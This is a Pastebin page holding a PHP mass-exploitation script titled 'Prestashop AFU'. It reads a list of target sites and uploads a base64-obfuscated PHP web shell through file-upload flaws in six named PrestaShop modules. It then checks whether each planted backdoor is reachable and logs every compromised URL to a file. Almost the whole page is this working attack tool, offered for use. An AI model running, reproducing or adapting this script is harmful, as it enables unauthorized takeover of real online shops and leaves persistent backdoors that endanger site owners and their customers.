API tools faq
paste
Advertisement
AZZATSSINS_CYBERSERK

Prestashop AFU

AZZATSSINS_CYBERSERK
Jun 9th, 2017
260
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.62 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. ini_set('display_errors', 0);
  5. echo '<title>PRESTASHOP | UPLOAD</title><body bgcolor=silver><center><form method="post"><center><textarea name="azx"></textarea><br>
  6. <br><input name="anu" type="submit" value="Submit"></form></center><br><pre>';
  7. if($_POST['anu']){
  8. $ex=explode("\r\n",$_POST['azx']);
  9. echo"
  10. \n   ___ ________  ___ ___________________  ______\n  / _ /_  /_  / / _ /_  __/ __/ __/  _/ |/ / __/\n / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ //    /\ \  \n/_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/  \n                                                \n";
  11. echo"\n Scan ".count($_POST['azx'])." website\n\n";
  12.  
  13.  
  14.  
  15. foreach($ex as $sites){
  16.     // Self backdoor creator
  17.     $azouz = 'PD9waHAgaWYoaXNzZXQoJF9GSUxFU1snYXp6YXRzc2lucyddWyduYW1lJ10pKXskbmFtZSA9ICRf
  18. RklMRVNbJ2F6emF0c3NpbnMnXVsnbmFtZSddOyRhenggPSAkX0ZJTEVTWydhenphdHNzaW5zJ11b
  19. J3RtcF9uYW1lJ107QG1vdmVfdXBsb2FkZWRfZmlsZSgkYXp4LCAkbmFtZSk7IGVjaG8gJG5hbWU7
  20. fWVsc2V7IGVjaG8gIkFaWkFUU1NJTlMgPGJyPjxmb3JtIG1ldGhvZD1wb3N0IGVuY3R5cGU9bXVs
  21. dGlwYXJ0L2Zvcm0tZGF0YT48aW5wdXQgdHlwZT1maWxlIG5hbWU9YXp6YXRzc2lucz48aW5wdXQg
  22. dHlwZT1zdWJtaXQgdmFsdWU9Jz4+Jz4iOw==';
  23.  
  24. $file = fopen("azx.php" ,"w+");
  25. $write = fwrite ($file ,base64_decode($azouz));
  26.  
  27. chmod("azx.php",0044);
  28.    echo " \nScaning > $sites";
  29.    $sites=trim($sites);
  30.    //////////// modules classes
  31.     echo "\n\n       Testing Simpleslideshow";
  32.    $uploadfile="azx.php";
  33.    $url = "/modules/simpleslideshow/uploadimage.php";
  34.    $url2 = "/modules/simpleslideshow/slides/azx.php";
  35.    $ch = curl_init("$sites.$url");
  36.    curl_setopt($ch, CURLOPT_POST, true);
  37.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile"));
  38.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  39.     $postResult = curl_exec($ch);
  40.    curl_close($ch);
  41.  $get1=@file_get_contents($sites.$url2);
  42.     if(preg_match('#AZZATSSINS#',$get1)){
  43.     echo "\n\t $sites$url2";
  44.     $f = fopen("azx.htm","a+");
  45.         fwrite ($f,$sites.$url2."<br>");
  46.         fclose($f);
  47.         } else {
  48.         echo "\n\t Fail ";
  49.    
  50. }
  51.   ////////////
  52.     echo "\n       Testing Productpageadverts";
  53.    $uploadfile2="azx.php";
  54.    $url3 = "/modules/productpageadverts/uploadimage.php";
  55.    $url24 = "/modules/productpageadverts/slides/azx.php";
  56.    $ch = curl_init("$sites.$url3");
  57.    curl_setopt($ch, CURLOPT_POST, true);
  58.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2"));
  59.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  60.     $postResult = curl_exec($ch);
  61.     curl_close($ch);
  62.  $get12=@file_get_contents($sites.$url24);
  63.     if(preg_match('#AZZATSSINS#',$get12)){
  64.     echo "\n\t $sites$url24";
  65.     $f = fopen("azx.htm","a+");
  66.         fwrite ($f,$sites.$url24."<br>");
  67.         fclose($f);
  68.         } else {
  69.         echo "\n\t Fail";
  70.    
  71. }
  72.    ////////////
  73.     echo "\n       Testing Columnadverts";
  74.    $uploadfile23="azx.php";
  75.    $url34 = "/modules/columnadverts/uploadimage.php";
  76.    $url245 = "/modules/columnadverts/slides/azx.php";
  77.    $ch = curl_init("$sites.$url34");
  78.    curl_setopt($ch, CURLOPT_POST, true);
  79.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile23"));
  80.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  81.     $postResult = curl_exec($ch);
  82.     curl_close($ch);
  83.  $get123=@file_get_contents($sites.$url245);
  84.     if(preg_match('#AZZATSSINS#',$get123)){
  85.     echo "\n\t $sites$url245";
  86.     $f = fopen("azx.htm","a+");
  87.         fwrite ($f,$sites.$url245."<br>");
  88.         fclose($f);
  89.         } else {
  90.         echo "\n\t Fail";  
  91. }
  92.   ////////////
  93.       echo "\n       Testing Homepageadvertise";
  94.    $uploadfile234="azx.php";
  95.    $url345 = "/modules/homepageadvertise/uploadimage.php";
  96.    $url2456 = "/modules/homepageadvertise/slides/azx.php";
  97.    $ch = curl_init("$sites.$url345");
  98.    curl_setopt($ch, CURLOPT_POST, true);
  99.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile234"));
  100.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  101.     $postResult = curl_exec($ch);
  102.     curl_close($ch);
  103.  $get124=@file_get_contents($sites.$url2456);
  104.     if(preg_match('#AZZATSSINS#',$get124)){
  105.     echo "\n\t $sites$url2456";
  106.         $f = fopen("azx.htm","a+");
  107.         fwrite ($f,$sites.$url2456."<br>");
  108.         fclose($f);
  109.         } else {
  110.         echo "\n\t Fail";  
  111. }
  112.   //////////
  113.       echo "\n       Testing Attributewizardpro";
  114.    $uploadfile2345="azx.php";
  115.    $url3456 = "/modules/attributewizardpro/file_upload.php";
  116.    $url24567 = "/modules/attributewizardpro/file_uploads/azx.php";
  117.    $ch = curl_init("$sites.$url3456");
  118.    curl_setopt($ch, CURLOPT_POST, true);
  119.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2345"));
  120.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  121.     $postResult = curl_exec($ch);
  122.     curl_close($ch);
  123.  $get125=@file_get_contents($sites.$url24567);
  124.     if(preg_match('#AZZATSSINS#',$get125)){
  125.     echo "\n\t $sites$url24567";
  126.         $f = fopen("azx.htm","a+");
  127.         fwrite ($f,$sites.$url24567."<br>");
  128.         fclose($f);
  129.         } else {
  130.         echo "\n\t Fail";  
  131. }
  132.  ///////////
  133.      echo "\n       Testing Vtemslideshow";
  134.    $uploadfile2349="azx.php";
  135.    $url3450 = "/modules/vtemslideshow/uploadimage.php";
  136.    $url24560 = "/modules/vtemslideshow/slides/azx.php";
  137.    $ch = curl_init("$sites.$url3450");
  138.    curl_setopt($ch, CURLOPT_POST, true);
  139.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2349"));
  140.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  141.     $postResult = curl_exec($ch);
  142.     curl_close($ch);
  143.  $get1276=@file_get_contents($sites.$url24560);
  144.     if(preg_match('#AZZATSSINS#',$get1276)){
  145.     echo "\n\t $sites$url24560";
  146.             $f = fopen("azx.htm","a+");
  147.         fwrite ($f,$sites.$url24560."<br>");
  148.         fclose($f);
  149.         } else {
  150.         echo "\n\t Fail \n";  
  151. } }
  152. }
  153. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!